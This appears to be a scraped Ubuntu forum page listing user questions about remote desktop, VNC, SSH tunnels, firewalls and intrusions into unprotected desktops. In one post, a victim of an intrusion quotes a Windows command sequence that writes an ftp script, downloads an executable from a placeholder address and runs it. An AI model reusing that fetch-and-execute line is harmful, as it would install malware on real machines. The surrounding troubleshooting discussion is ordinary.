Ubuntu Security :: Firewall Killed Remote Desktop?
Aug 1, 2011
I have been using Remote desktop on Windows 7 to view and control my Ubuntu machine in the office quite happily over the office network. No problems there. I wanted to access it from my home connection so I read that I could do this by opening a port on the ubuntu machine's firewall. So I installed a firewall. Didnt see any way to open a port easily so I uninstalled it and installed another one. Same issue so I uninstalled that and then left it. I then tried to Remote Desktop the Ubuntu machine from my Windows 7 laptop and ERROR I can no longer connect.
View 6 Replies
ADVERTISEMENT
Apr 22, 2011
Let's say I have a Linux workstation at work, behind a firewall. So even though I may have a remote access server set up on it (such as the most excellent NoMachine NX Server), I can't access it from home.
My home network happens to have a Linux server. Is it possible to ssh from work to the home Linux machine and set up a tunnel so that once I'm at home, I can run the NX client, point it to my home Linux box on some port like 9000, and have that forward through the tunnel to port 22 on my work Linux box? How would I set this up?
View 2 Replies
View Related
Jul 6, 2010
I always use VNC to check my server for updates, and this morning I started the xvnc4viewer to vnc into my server and it keep asking for a password. I never setup a password because I do this local from my laptop, and I am the only one who uses my laptop. I had to go to my server and check the setting in System > Preferences > Remote Desktop and found them all changed. There was a password setup and there was a check mark in the you must confirm each access to this machine there some security update that changed all these setting? Sometimes when I do updates I don't know what is being changed on my server
View 9 Replies
View Related
Mar 24, 2010
So I've read a bit and it seems that this is okay and secure. But I wanted to double check here with everyone, because I trust here more than just about anywhere. I've read about the hipporemote (which is pretty cool) and I have it working. Basically I want to make sure my system is still secure.
1. I had to open a port on my firewall for the VNC connection.
2. I turned on the Remote Desktop
2a. Checked Allow other users to view....
2b. Checked Allow other users to control....
2c. Checked You must confirm.....
2d. Checked for password, and put in a password
2e. Checked Configure network automatically to accept connectios
So with doing all of that, am I ok? I think so, especially since it says its only accessible on my local network. But I just wanted to hear from people who know more than I do that I don't need to worry any more than normal about others accessing my machine. I'm mainly thinking 2e, I don't fully understand what's going on there.
View 9 Replies
View Related
Mar 21, 2010
Today I noticed my Desktop was being controlled remotely from over the Internet even though I had it set for 'local network only'. Foolishly I relied on this setting and hadn't specified a password or other security. The remote user had opened my Firefox passwords page and was perusing this when I pulled the plug.
All external checks confirmed that my router/firewall is actively blocking correctly. How could this happen? How can I prevent this in the future? I had recently install the Firefox extension for Weave Sync and wonder if that had anything to do with it?
View 9 Replies
View Related
Nov 26, 2010
I just had a window pop up on my desktop saying my pc was being remotely controlled. Ubuntu 10.10The pc shutdown by itself, and I disconnected it from the net.I rebooted and uninstalled the remote desktop app.
View 7 Replies
View Related
Feb 16, 2010
I am attempting to set up a VNC with ssh tunneling for remote desktop between my laptop (opensuse 11.2) and my desktop (kubuntu karmic) and using the instructions here: [URL] and here: [URL] but I am having trouble getting remote desktop to work once I establish the ssh tunnel
I start out with
Code:
ssh <user@remotepc> -p <non22port> -L 5900:localhost:5900
That seems to wok and connect properly
The problem comes when I try to use a remote desktop client on the laptop to initiate the VPN desktop sharing and point it to
Code:
localhost:5900
Thats when I get a notification on the host saying:
Code:
Refused uninvited connection attempt from 127.0.0.1
And on the laptop I get:
Code:
VNC server closed connection
I have tried messing with the few settings in Krfb, but none seem to have any impact. How do I open localhost:5900 and allow VPN tunneling to the host machine?
View 2 Replies
View Related
Jun 5, 2011
I was sitting watching a TV show on the internet (streaming from channel 4) and all of a sudden I get a request from an unknown IP address, outside of my local network attempting to access my ubuntu desktop, I obviously declined straight away and stupidly didn't take note of the IP I've checked my firewall settings and no ports are being forwarded, everything is as it should be. I am running Ubuntu 11.04, and a little bit concerned. As of now I have completely disabled remote desktop on my laptop.
View 1 Replies
View Related
Apr 27, 2010
I was working on my desktop under Ubuntu 9.10 when I got a message in the the upper right telling me that my Remote Desktop Connection had been activated. I don't know who it was, but they proceeded to open up a terminal and start typing a bunch of stuff. This scared the living @#$^ out of me, so I didn't really pay attention to what he was doing and immediately dove for the reset button. I disconnected my network from the web and found that RDC was NOT password protected.
Now, I probably did this a little while ago while I was playing around with it, but I also set up an account with dyndns.org. Would this possibly increase the number of attacks on my network? Just in case, I have removed my listing. Also, would any of this incident be logged somewhere? How/Where would I look to see if I'm being poked and prodded for another security hole?
View 6 Replies
View Related
Oct 14, 2010
I have a home LAN server with Ubuntu Desktop edition 10.10 and I'm having a problem with remote desktop application. For now I have a monitor on that machine, but in the future it's gonna be only the box, without any periferal devices. When I try to log in via UltraVNC from Windows XP, on Ubuntu server a little window pops up, asking me to allow or refuse this "invader", so I click Allow and I really have full control on that machine. However, when I dont have any devices I wouldnt be able to click this Allow button, but will have to have full control. So, my question is how to autoclick this Allow button? Or when I try to log in the ubuntu machine, it would automatically give me full control?
View 5 Replies
View Related
Dec 30, 2010
host always ask password on 1st remote desktop (VNC) access Desktop version... how can I disable this?
View 2 Replies
View Related
Jul 20, 2010
I was running ubuntu 10.04 on a school laptop connected to the network. I was editing a file in emacs on an ssh connection to a school server when all of a sudden I see the remote desktop graphic (a thing that looks like a widescreen monitor) pop up in the top panel. A second later it announces that someone else has connected to my computer with 'ffff:someip'. I'm not sure of the specifics because I was too shocked. I do remember it started with some number of f's before a : The hacker then started typing
Code:
%systemroot%system32cmd.exe
del eq&e
I promptly yanked out the ethernet cable before anything else could be typed. I then went in and changed the Remote Desktop preferences to not allow anyone in. I'm guessing that I cut the hacker off from fully entering in a command similar to this:
Code:
%systemroot%system32cmd.exe
del eq&echo open 0.0.0.0 13643 >> eq&echo user 13302 30046 >> eq &echo get
mswinsvcr.exe >> eq &echo quit >> eq &ftp -n -s:eq &mswinsvcr.exe &del eq
which I found here: [URL]
How concerned should I be? It appears to be a windows hack. Did I prevent any damage from occurring? Is Remote Desktop really that easy to connect to another persons computer? I know this question is bait in a way. On my home machines I only allow vnc via ssh tunnels and that is through a router with proper port forwarding for the ssh ports and very few other ports forwarded. Such an attack has never happened to me at home. Is this possibly due to my setup or was I just lucky no one picked my computer to hack? So is the ssh tunnel & port forwarding a sufficiently safe setup or am I still at risk?
What degree of protection does the ssh tunnel and port forwarding provide? What else should I do to make my current home setup even more secure? The text I wrote above was the only text typed into the terminal. Because the attack was over Remote Desktop, what is the possibility that it was a bot? The text appeared slow enough for me to think that there was a person rather than a machine/program typing in the text. Does the Remote Desktop connection in a way provide a level of abstraction that prevents scripts as commands must be typed in through the Remote Desktop connection (vs. a ssh connection where a script might more easily be uploaded and executed)?
In the end I'm curious as to what else might have been accessed over the connection or if it was probably just restricted to the hacker attempting to run some windows commands? Since they connected via Remote Desktop and I saw the connection pop up and the typing begin in my terminal, did I see everything that the hacker attempted to perform? Am I correct in my research in finding that there is no log for Remote Desktop connections and therefore I can't find the ip they were connecting from? However, I would like to use this as a wake up call to myself to prevent unwanted access on my home computers.
View 9 Replies
View Related
May 9, 2011
Can we use iptables as firewall instead of Juniper firewall
View 2 Replies
View Related
Jul 7, 2010
I'm completely new to Ubuntu and only installed yesterday for the first time. The install worked fine. After booting it asked me to install updates. I did this and now when I boot i get:
Gave up waiting for root device. Common Problems:
- Boot args (cat /proc/cmdline)
- Check rootdelay= (did the system wait long enough)
- Check root= (did the system wait for the right device)
- Missing modules (cat /proc/modules: ls /dev)
ALERT! /dev/disk/by-uuid/blah blah does not exist. Dropping to a shell Now I've tried searching through the forums and I've seen people with similar problems however none of the solutions suggested to them have worked. The only thing that may work if it is explained to me how to do it is in Grub 2 it is looking for a UUID. Now I tried editing this on startup to /dev/sda5 instead and it loads. Only thing is I read that this is temporary and would have to do it each time which means it's a workaround not a solution. As I explained at the start, first time of using Ubuntu and so far haven't been particularly impressed as I have another problem with the processor being used up by loads of 'udevd
View 8 Replies
View Related
Sep 23, 2010
I have a Suse11 box with 2 network cards:
I have squid as a proxy on the Suse box, and with the default firewall I have to enable masquerading to allow clients on the eth3:1-3 to send and receive mail through the Suse box. I found the Suse firewall completely inadequate (all P2P software/connections are allowed once you enable masquerading) and had to install ConfigServer Security & Firewall. In die configuration of csf I could get my way around getting smtp to work for the eth3:1-3 clients, but pop3 connections does not go through the box. I know I need to allow port 110 and 995 to masquerade of NAT (or something) and then the same for port 22
View 2 Replies
View Related
Jan 11, 2010
was home when the attack took place I was running a vnc server that was tunnled thru ssh. At approximatley 5:00 pm eastern time my box turned on firefox and flashed a popup. I tried to get to the logs and then realized that the entre system had been hijacked the remote desktop icon was active there was a message in gnote saying "youve been own3d". The system Is a old mac mini PPC system and i plan on looking at the system log with a netboot cd by running linux rescue at boot. my question is how do i gain access to the system log from a rescue cd to find out how much damage this hacker did?
View 4 Replies
View Related
Mar 10, 2010
I Just clicked on the Desktop Effects menu item and the system rebooted and now I can only log in through a tty. I have to use "startx" to get X to start up then I seem to have no file manager.
It seems Desktop Effects and my nvidia driver don't play well.
Here are the xsession-errors
PHP Code:
I noticed this in the messages log
PHP Code:
View 2 Replies
View Related
Feb 6, 2011
I maintain plain vanilla Ubuntu 10.04 systems for several friends. Each machine has only one user, the owner. I use Remote Desktop to instruct and to perform maintenance. Here's my problem:After updating the system, if the kernel has changed, a restart is needed. If I do a restart, I then have to phone the owner to insert his login credentials in the gdm login screen, before I can do anything else via Remote Desktop on that machine.There ought to be a simple way I can avoid the phone call and login myself.
I'd strongly prefer not to use any software that is not included in a plain vanilla Ubuntu 10.04 installation. And I don't want to weaken system security beyond what it is now.Is there a solution? Or, what is the simplest solution?
View 2 Replies
View Related
Feb 23, 2011
I tried installing F-prot's linux scanner but it doesn't seem to want to install and I am tired of messing with it.
So I am wondering if I even need it or if there is something else.
I am behind a firewall already with my router if that helps any.
I guess I am having trouble understanding why virus protection is less necessary.
Do people not write viruses for linux systems?
View 7 Replies
View Related
Feb 27, 2010
I have Linux computers that are often on client networks inside firewalls . They have access to the internet but I can't access them directly. I don't want to have to get the client to mess with NATing , etc . I have written a system that uses XMPP to allow me to send commands to the computers and run simple console commands which often time is enough. These are things like run a report and ftp up to server, restart a process, give me a process list. It works OK, but some networks even block this (Googletalk is not universally loved for some reason)
I am wondering if there is a prebuilt system that allows me a computer inside one firewall (say a standard adsl modem created one) communicate in some way with a computer inside a network created by another adsl modem. I could see some sort of console like logmein or pc anywhere but as much as I have looked I can't find anything. I have considered writing a cheap and cheerful system in http or even a TCP system using asyncore in python but there must be something existent. I have a server on the web that could be used as an intermediary, relay type thing. Basically some sort of chat server for consoles is what I am thinking about. Is there some sort of SSH voodoo that I could bridge/tunnel/vpn through.
View 3 Replies
View Related
Jan 10, 2010
Printer is connected via USB to server PC running OpenSUSE 11.1 Client PCs are running 11.1, XP, Vista No problem printing from the Windoze machines
Printing is trouble free with the 11.1 client's firewall disabled, but no printer is available with firewall running.
In hopes of diagnosing the problem I figured I'd open everything I could think of until the printer remained available with the firewall running. Then I planned to start removing exceptions one at a time 'til removing one caused the printer to disappear.
I've gone to Yast>Security and Users>Firewall>Allowed Services>External Zone and tried addingSamba Server
NetBIOS server
Samba Client
Samba Server
VNC
[Code]....
View 5 Replies
View Related
May 31, 2011
I have a server machine that is running SUSE Linux Enterprise Server 11. I set up a mysql server there. Now I want to access this mysql server from my laptop. I used the following command,
> mysql -h 12.246.5.70 -u davidehs -p
I found if the firewall on the server machine is running, I can not connect the mysql server from my laptop. If I stop the firewall first, and the do the connection, I can access the mysql. how to keep the firewall running and allow the remote mysql incoming requests?
View 4 Replies
View Related
Jan 28, 2011
I have a server machine that is running SUSE Linux Enterprise Server 11. I set up a mysql server there. Now I want to access this mysql server from my laptop. I used the following command,
> mysql -h 12.246.5.70 -u davidehs -p
I found if the firewall on the server machine is running, I can not connect the mysql server from my laptop. If I stop the firewall first, and the do the connection, I can access the mysql. Do you guys have any idea how to keep the firewall running and allow the remote mysql incoming requests?
View 11 Replies
View Related
Mar 18, 2010
I'm working on getting my myth box hooked up to my Sony flat panel display.Originally the nvidia drivers could not read the EID, so defaulted to only 640x480 over my HDMI-DVI connection.I manually updated xorg.conf with a mode for the resolution I know the thing can handle. Suddenly there are several resolutions avaialble in nvidia-settings and it seems to be communicating with the TV, as it is now listed as a Sony FP display rather than a CRT.I'm able to change the resolution now as expected.my problem, however, lies with the TV itself. I can't seem to get it to actually display the output. I'm able to remote desktop into the box and can see Gnome logged in and everything.However nothing on the TV itself.How do I troubleshoot this? Am I missing something obvious?
View 6 Replies
View Related
Nov 20, 2010
I have my main box, Ubuntu 10.04lts, and I am trying to use remote desktop viewer to see the desktop on a Windows XP machine. The machines are side by side The Ubuntu box is hardwired to my network router, and the XP machine is connected via wireless. Both get to the internet fine, and I can ping the Ubuntu box from the XP box. But, I cannot ping the XP box from the Ubuntu box, and Remote Desktop Viewer won't establish a connection to the VNC server I have running on the XP box.
View 6 Replies
View Related
Jul 20, 2010
I have Ubuntu running on an old PE server. It is running Virtualbox with an instance of Ubuntu inside. The instance is there to run my honeypot.
The server box IP is192.168.1.10. The Virtualbox is bridged with it's own IP of 192.168.1.200. The honeypot daemon is listening to 192.168.1.201 with arpd.
I set up the UFW with DENY. And then enabled only the ports leading to the honeypot scripts which are abound to IP .201. I then forwarded the ports necessary to run VNC to .200.
Here is the UFW status:
buntu@ubuntu-desktop:/var/lib$ sudo ufw status
Status: active
To Action From
-- ------ ----
192.168.1.201 21/tcp ALLOW 21/tcp
192.168.1.201 4444/tcp ALLOW 4444/tcp
192.168.1.201 5544/tcp ALLOW 5544/tcp
[Code].....
View 8 Replies
View Related
Nov 25, 2010
I am using 2 PCs, both running ubuntu. I want to connect via remote desktop (vnc, ssh -X, etc) form one to the other. However, what the solutions I found until now offer me, is the possibility to create a new desktop session and view that one (or run an application an view that one). I have an application running on the server, and I want to see that application, without needing to restart it or running it again in a new desktop. Is this possible?
View 1 Replies
View Related
Apr 8, 2011
I am trying to setup my HTPC. I wanted to have the most minimal overhead possible so I installed Ubuntu 10.10 server from the mini.iso and just added the ssh option. I then used the following command to give me a desktop environment because I will want to run firefox and it apparently requires this to run.
Here is the command that I ran:apt-get install xorg gnome-core gdm gnome-applets gnome-system-tools gnome-utils ubuntu-artwork compiz-gnome firefox sysv-rc-conf.The desktop works fine and I can open fire fox, however, the remote desktop is missing from the preferences menu.How can I install this? I would like to add the remote desktop option from a command line.
View 6 Replies
View Related
Jul 19, 2011
I have set up a server running ubuntu desktop, and I'm able to logon through remote desktop (win 7). The problem is that if I logon from computer 1 and open some programs, I don't see these programs when I logon from computer 2.I logon with the same user, so I find this strange. Is there some setting I have missed to be able to see the same from any computer (logon through remote desktop).
View 5 Replies
View Related
May 23, 2010
Will I need to actiavte the firewall that comes with Ubuntu since I'm using Transmission?
View 9 Replies
View Related
